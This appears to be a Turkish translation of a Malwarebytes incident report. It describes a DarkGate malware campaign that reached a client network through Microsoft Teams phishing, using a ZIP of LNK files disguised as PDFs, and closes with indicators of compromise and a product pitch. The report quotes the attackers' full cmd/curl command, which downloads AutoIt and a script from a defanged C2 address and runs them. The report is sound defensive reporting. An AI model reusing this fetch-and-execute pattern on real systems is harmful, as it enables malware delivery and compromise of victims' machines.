13 Eylül 2023’te Malwarebytes MDR ekibi, bir istemci ağında yeni bir DarkGate kötü amaçlı yazılım kampanyası tespit etti.
İlk kez 2018’de kamuoyuna duyurulan DarkGate, kimlik bilgilerinin çalınması ve kurbanların uç noktalarına uzaktan erişim dahil olmak üzere çok çeşitli yeteneklere sahip, Windows tabanlı bir kötü amaçlı yazılımdır. Yakın zamana kadar, yalnızca geleneksel e-posta malspam kampanyaları yoluyla iletildiği görülüyordu. Ancak Ağustos 2023’ün sonlarında Trusec’teki araştırmacılar, DarkGate Loader’ı sunmak için harici Teams mesajlarını kullanan bir kampanyanın kanıtını buldu.
13 Eylül 2023’te Malwarebytes MDR ekibi aynı kampanyayı bir müşteri ağında tespit etti.
İlk Olay
Tehdit, Microsoft Teams aracılığıyla yapılan bir kimlik avı girişimiyle başladı. Saldırganlar “adlı kötü amaçlı bir ZIP dosyası gönderdiler”C_onfidential Sign_ificant Şirket Değişiklikleri.zip” (saldırının farklı yinelemelerinde adlar değişebilir).
Aynı DarkGate kampanyasındaki hedeflere Microsoft Teams aracılığıyla gönderilen kimlik avı mesajı. Resim: Truesec
Bazı çalışanlar bunun meşru olduğuna inanarak bu dosyaya tıkladı. Ancak bu ZIP dosyasının içinde, PDF belgeleri olarak gizlenmiş birkaç kötü amaçlı kısayol dosyası veya LNK dosyası vardı.
Bu LNK dosyalarının adları “EMPLOYEES_AFFECTED_BY_TRANSITION.PDF.LNK” Ve “COMPANY_TRANSFORMATIONS.PDF.LNK“.
Kötü Amaçlı Komuta
Çalışanlar bu kısayollara tıkladığında kötü amaçlı bir komut satırı tetiklendi. Amacı? Uzak bir IP adresinden zararlı bir komut dosyası indirmek ve çalıştırmak için. Neyse ki Malwarebytes EDR bu IP’yi ‘Bilinen kötü’ hedef olarak tanıdı ve engelledi.
Curl komutları gibi işlemleri yürütmek için birden fazla girişimde bulunulması
DarkGate Yükleyici – Suçlu
MDR ekibi olayı daha derinlemesine araştırdıkça bunun rastgele bir saldırı olmadığını keşfetti. DarkGate Loader’ı yüklemek için Teams kimlik avı kullanan bilinen bir kötü amaçlı yazılım saldırı kampanyasına bağlandı. Curl komutunun kullanımı, kötü amaçlı dosyaları alıp kurbanın makinesine bırakmaktır:
"C:\Windows\System32\cmd.exe" /k curl -# -o"C:\Users\[Redacted]\AppData\Local\Temp\Autoit3.exe" "
http://5[.]188[.]87[.]58:2351" -o
"C:\Users\[Redacted]AppData\Local\Temp\btbgvbyy.au3"
"http://5[.]188[.]87[.]58:2351/msibtbgvbyy" "C:\Users\[Redacted]\AppData\Local\Temp\Autoit3.exe"
"C:\Users\[Redacted]\AppData\Local\Temp\btbgvbyy.au3" & exit
Kötü amaçlı komut bir AutoIt betiğini çalıştırmayı dener (btbgvbyy.au3). Tehdit İstihbaratı Direktörü Jerome Segura, meşru bir kodlama dili olan AutoIt kullanımının DarkGate’in ilk sürümlerinde zaten mevcut olduğunu belirtiyor.
Malwarebytes EDR şüpheli AutoIt etkinliğini algılıyor
Tehlike Göstergeleri (IOC’ler) sergileyen virüslü sistem
Durumun ciddiyetinin farkına varan ekip, Uzlaşma Göstergelerini (IOC’ler) toplamaya başladı. Buna ZIP dosyasının karmaları, içeriği ve kısayollar tarafından başlatılan kötü niyetli komut dosyası örnekleri de dahildi.
Alınan Aksiyonlar
Etkilenen makinelerin izole edilmesiyle hızlı bir önlem alındı. Her ne kadar Malwarebytes EDR kötü amaçlı IP’yi zaten engellemiş olsa da, MDR ekibi ekstra önlemler alarak uç noktalarda saldırganlara sisteme arka kapı açabilecek herhangi bir kalıcılık mekanizmasının bulunmadığından emin oldu.
MDR ekibi ayrıca, bu kampanyadaki birincil saldırı vektörü olan Microsoft Teams’deki harici hesaplardan dosya indirilmesinin engellenmesini de önerdi.
Olaydan Alınan Dersler
Bu kampanyaların arkasındaki tehdit aktörleri, kaçırma tekniklerinin bir kombinasyonunu kullanarak DarkGate’i minimum sistem ayak iziyle dağıtabiliyor. Enfeksiyon devam etseydi şirket potansiyel veri ihlalleri, operasyonel kesintiler, mali kayıplar ve daha fazlasıyla karşı karşıya kalabilirdi.
Neyse ki, Malwarebytes MDR, EDR ve müşterinin ortak çabaları DarkGate kötü amaçlı yazılımını başarılı bir şekilde azalttı ve müşterinin dijital ortamını olası yeniden enfeksiyona karşı korudu.
Malwarebytes MDR’nin bugün kuruluşunuzun güvenliğini sağlamaya nasıl yardımcı olabileceği hakkında daha fazla bilgi edinin: https://try.malwarebytes.com/mdr-consultation-new/
Malwarebytes MDR teklifi alın
Malwarebytes MDR analistlerinin müşteri ağlarında tehdit avcılığını nasıl yaptığına ilişkin diğer ön saf hikayelerini okuyun:
Bir truva atının izini sürmek: Kurumsal bir ağdaki tehdit avcılığına içeriden bir bakış
Fidye yazılımının yeniden bulaşmasını anlama: Bir MDR vaka çalışması
Uzlaşma Göstergeleri (IoC)
Dosya Ayrıntıları:
Filename: C_onfidential Sign_ificant Company Changes.zipReported At: 09/13/2023 9:57:56 AM
Ağ Göstergeleri:
C2 IP Address: 5[.]188[.]87[.]58
Kötü amaçlı URL’ler:
http://5[.]188[.]87[.]58:2351http://5[.]188[.]87[.]58:2351/msibtbgvbyy